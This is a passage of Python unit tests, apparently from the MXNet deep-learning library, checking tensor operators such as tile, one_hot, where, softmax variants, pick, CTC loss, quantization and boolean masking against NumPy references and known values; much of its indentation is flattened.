data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
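# NumPy reference for where(): the condition either matches the data shape elementwise,
# or is a 1-D vector that selects whole rows along the first axis.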
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert same(expect_out, out)
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def np_softmax(x, axis=-1, temperature=1.0, normalize=True):
if normalize:
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x / temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
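# Illustrative sketch, not part of the original test suite: a hand-checkable use of
# np_softmax. The helper name below is ours and is never called by the tests.
def _np_softmax_example():
    # equal logits give a uniform distribution
    uniform = np_softmax(np.zeros(4))            # -> [0.25, 0.25, 0.25, 0.25]
    assert np.allclose(uniform, 0.25)
    # temperature merely rescales the logits: softmax(x, T) == softmax(x / T)
    x = np.array([1.0, 2.0, 3.0])
    assert np.allclose(np_softmax(x, temperature=2.0), np_softmax(x / 2.0))
    return uniform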
def np_masked_softmax(data, mask, axis=-1, temperature=1.0, normalize=True):
neg = -1e18
if data.dtype == np.float16:
neg = -1e4
temp = np.where(mask, data, neg)
result = np_softmax(temp, axis=axis,
temperature=temperature,
normalize=normalize) * mask
return result
def np_masked_softmax_grad(out, grad_out, axis=-1, temperature=1.0):
temp = np.sum(out * grad_out, axis=axis, keepdims=True)
result = out * (grad_out - temp) / temperature
return result
def np_masked_log_softmax_grad(out, grad_out, mask, axis=-1, temperature=1.0):
grad_out = np.where(mask, grad_out, 0)
temp = np.sum(grad_out, axis=axis, keepdims=True)
result = (grad_out - np.exp(out) * temp) / temperature
result = np.where(mask, result, 0)
return result
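# Background for the two gradient helpers above (our restatement, not taken from the
# original sources): with y = softmax(x / T) the vector-Jacobian product is
#     dL/dx = y * (dL/dy - sum(y * dL/dy, axis)) / T,
# which is what np_masked_softmax_grad computes. For z = log_softmax(x / T) the
# corresponding identity is
#     dL/dx = (dL/dz - exp(z) * sum(dL/dz, axis)) / T,
# and np_masked_log_softmax_grad additionally zeroes the masked positions before and
# after applying it.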
@pytest.mark.parametrize('dtype', [np.float16, np.float32, np.float64])
@pytest.mark.parametrize('axis', [0, -1, -2, -3])
@pytest.mark.parametrize('ndims', [3, 4, 5])
@pytest.mark.parametrize('n_broadcast_axis', [0, 1, 2])
@pytest.mark.parametrize('temperature', [1, 5, 9, 11])
@pytest.mark.parametrize('normalize', [True])
@pytest.mark.flaky
def test_masked_softmax(dtype, axis, ndims, n_broadcast_axis, temperature, normalize):
n_broadcast_axis = min(n_broadcast_axis, ndims - 1)
shape = rand_shape_nd(ndims, dim=10)
mx_data = rand_ndarray(shape, dtype=dtype)
bcst_dims = []
while len(bcst_dims) < n_broadcast_axis:
ax = np.random.randint(0, ndims)
        if ax not in bcst_dims:
bcst_dims.append(ax)
shape_mask = list(shape)
for i in bcst_dims:
shape_mask[i] = 1
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape_mask)
    mx_mask = mx.nd.array(np_mask, dtype=np.bool_)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np_masked_softmax(np_data, np_mask, axis,
temperature, normalize)
np_grad_out = np_masked_softmax_grad(np_out, np_grad,
axis, temperature)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_softmax(data=data, mask=mask,
temperature=temperature, axis=axis,
normalize=normalize)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol,
dtype="asnumpy", equal_nan=True)
check_symbolic_backward(mx_sym, location, [mx_grad],
                            [np_grad_out, np.zeros(shape, dtype=np.bool_)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
@pytest.mark.parametrize('dtype', ['float32'])
@pytest.mark.parametrize('ndims', [1, 2, 3, 4, 5])
def test_masked_log_softmax(dtype, ndims):
shape = np.random.randint(1, 5, size=ndims)
axis = np.random.randint(0, ndims)
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape)
    mx_mask = mx.nd.array(np_mask, dtype=np.bool_)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np.log(np_masked_softmax(np_data, np_mask, axis)+1e-20) * np_mask
np_out_inf = np.where(np_mask, np_out, -np.inf)
np_grad_out = np_masked_log_softmax_grad(np_out, np_grad, np_mask, axis)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_log_softmax(data=data, mask=mask, axis=axis-ndims)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out_inf], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [mx_grad],
                            [np_grad_out, np.zeros(shape, dtype=np.bool_)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc._bind(ctx=default_context(), args=[acts_nd, labels_nd])
    # test forward with grad calc
    exe.forward(is_train=True)
    out_train = exe.outputs[0].copy()
    # test forward without grad calc
    exe.forward(is_train=False)
    out_test = exe.outputs[0]
    # make sure losses calculated with both modes are the same
    assert_almost_equal(out_train, out_test)
    # test against ground truth, if available
    if loss_truth is not None:
        assert_almost_equal(out_test, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
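# Shape convention assumed by check_ctc_loss above (our reading of the inputs used in
# the tests below, not a restatement of the API docs): `acts` is laid out as
# (sequence_length, batch_size, alphabet_size) and `labels` as
# (batch_size, label_sequence_length), so the 3x2x5 activations in test_ctc_loss
# describe a batch of two length-3 sequences over a 5-symbol alphabet.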
def test_ctc_loss():
    # Test 1: identical batch entries should give identical losses; compare against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
    # Test 3: check using an integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
    for i in range(seq_len * batch_size):
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
